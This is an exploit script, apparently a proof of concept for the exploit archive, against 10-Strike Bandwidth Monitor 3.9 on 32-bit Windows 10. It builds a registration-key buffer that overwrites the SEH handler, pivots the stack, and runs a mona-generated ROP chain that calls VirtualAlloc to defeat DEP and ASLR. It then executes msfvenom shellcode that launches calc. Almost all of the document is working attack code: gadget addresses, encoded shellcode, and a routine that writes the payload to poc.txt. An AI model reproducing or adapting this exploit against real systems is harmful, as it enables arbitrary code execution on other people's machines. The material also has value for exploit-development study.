# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled, because the offset at which the pivoted ESP lands inside the buffer differs between runs (see the recorded landings below).
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using Return-Oriented Programming (ROP), choosing Gadgets from [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; none of these modules is compiled with Rebase or ASLR, so their gadget addresses are stable across runs (see the module table below).
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 (gets rewritten to \x20 / space) ; \x0D & \x0A (truncate the buffer)
#   Note: other low bytes (0x01-0x1F) are usable - the chain depends on them, since every gadget address starts with 0x01, 0x11 or 0x12 and several contain bytes such as 0x16 or 0x1b.
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
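# Filler in front of the RET sled. The stack pivot does not land at a fixed
# offset (see the per-run landings recorded in the header), so the sled, not
# this filler, is what absorbs that variance.
OS_retSled = b'\x41' * 400

# RET sled: 100 copies of a bare RETN so that wherever the pivoted ESP lands
# we slide forward into the ROP chain. The gadget is written once as a number
# and packed little-endian, instead of hand-reversing the bytes.
RET_GADGET = 0x11060124  # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
retSled = struct.pack('<I', RET_GADGET) * 100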
# Debugger snapshot taken when EIP reaches KERNEL32.VirtualAlloc (i.e. after the
# PUSHAD gadget and the JMP [EAX] in ESI have run). The stack frame listed after
# the registers is what VirtualAlloc sees as its return address and arguments.
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
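def createRopChain():
    """Build the DEP-bypass ROP chain as a little-endian byte string.

    The chain prepares the registers that PUSHAD then pushes onto the stack so
    that they form a VirtualAlloc call frame (compare the debugger snapshot in
    the header comments):

        EBX = 1           dwSize
        EDX = 0x1000      flAllocationType = MEM_COMMIT
        ECX = 0x40        flProtect = PAGE_EXECUTE_READWRITE
        ESP (by PUSHAD)   lpAddress = the stack page we are executing from
        EBP = POP EBP # RETN  (return address after VirtualAlloc)
        ESI = JMP [EAX]   executes the VirtualAlloc pointer held in EAX
        EDI = RETN        ROP NOP, first thing PUSHAD's frame returns into
        EAX = IAT slot holding &KERNEL32.VirtualAlloc

    PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI in that order, so the
    final RETN lands on EDI's RETN, then ESI's JMP [EAX] calls VirtualAlloc.
    The last dword (push esp # ret) is what execution returns into afterwards,
    transferring control to the NOP sled that follows the chain in the buffer.

    Returns:
        bytes: 85 packed dwords (340 bytes). All addresses are in modules that
        are neither rebased nor ASLR'd, so the chain is only valid for the
        exact module bases listed in the header (v3.9 on Win10 1909 x86).
    """
    # rop chain generated with mona.py - www.corelan.be
    inc_ecx = 0x1101597d  # INC ECX # RETN [LIBEAY32.dll]
    ropGadgets = [
        0x1202ef02,  # POP EBP # RETN [ssleay32.dll]
        0x1202ef02,  # skip 4 bytes [ssleay32.dll]
        # EBX = 1: start from -1 and increment twice (avoids a NULL byte).
        0x01215f16,  # POP EBX # RETN [BandMonitor.exe]
        0xffffffff,
        0x012175f5,  # INC EBX # RETN [BandMonitor.exe]
        0x01056ff7,  # INC EBX # RETN [BandMonitor.exe]
        # EDX = 0x1000: NEG(0xffffefff) = 0x1001, then DEC.
        0x011e94d4,  # POP EDX # RETN [BandMonitor.exe]
        0xffffefff,  # Value to negate, destination value : 0x00001000
        0x01218952,  # NEG EDX # RETN [BandMonitor.exe]
        0x011ead1b,  # DEC EDX # RETN [BandMonitor.exe]
        # ECX = 0x40: start from -1 and increment 65 times (1 below + 64 more).
        0x110c5b5e,  # POP ECX # RETN [LIBEAY32.dll]
        0xffffffff,
        0x11016023,  # INC ECX # RETN [LIBEAY32.dll]
    ] + [inc_ecx] * 64 + [
        0x1202fe55,  # POP EDI # RETN [ssleay32.dll]
        0x01225803,  # RETN (ROP NOP) [BandMonitor.exe]
        0x1105ed16,  # POP ESI # RETN [LIBEAY32.dll]
        0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
        0x012126f5,  # POP EAX # RETN [BandMonitor.exe]
        0x110e7198,  # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
        0x110762c4,  # PUSHAD # RETN [LIBEAY32.dll]
        0x110843b4,  # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    # b'' so the result is bytes on Python 3 as well as 2; the payload is
    # binary data and must never go through a text encoding.
    return b''.join(struct.pack('<I', gadget) for gadget in ropGadgets)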
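ropChain = createRopChain()
nopSled = b'\x90' * 100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"

# The SEH record sits at a fixed distance from the start of the input:
# nSEH at offset 4188, the handler (SEH) at 4192. Pad with 'C' so that
# everything before nSEH totals exactly NSEH_OFFSET bytes, whatever the
# sizes of the sled/chain/shellcode are. (The original expressed the same
# number as 4188-600-200-len(ropChain+nopSled+shellcode), with the 400+400
# byte sleds folded into the constants.)
NSEH_OFFSET = 4188
OS_nSEH = b'\x43' * (NSEH_OFFSET - len(OS_retSled + retSled + ropChain + nopSled + shellcode))

# nSEH is never executed: the handler address below is a stack pivot, not a
# short jump back into nSEH, so these four bytes are plain filler.
nSEH = b'\x44' * 4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
# NOTE(review): mona annotates the gadget as a 0x810-byte pivot while the line
# above records 1408 bytes; the two figures are not reconciled on this page.
SEH = struct.pack('<I', 0x01212870)  # 0x01212870 : {pivot 2064 / 0x810} [BandMonitor.exe], no SafeSEH
extra = b'\x44' * 2000

payload = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra

# Fail loudly if a bad character slipped in (e.g. after swapping the shellcode
# or a gadget): \x00 is rewritten by the target and \x0a/\x0d truncate the
# input, so such a payload can never work and would only waste a debug cycle.
BAD_CHARS = (b'\x00', b'\x0a', b'\x0d')
found_bad = [c for c in BAD_CHARS if c in payload]
if found_bad:
    raise SystemExit('payload contains bad characters: %r' % (found_bad,))

POC_FILE = 'poc.txt'
try:
    # Binary mode: text mode on Windows would translate any \x0a into \x0d\x0a
    # and silently corrupt the payload. The with-block closes the file even if
    # the write fails.
    with open(POC_FILE, 'wb') as f:
        f.write(payload)
    print(POC_FILE + " created successfully")
except (IOError, OSError) as exc:
    print(POC_FILE + ' failed to create')
    print(exc)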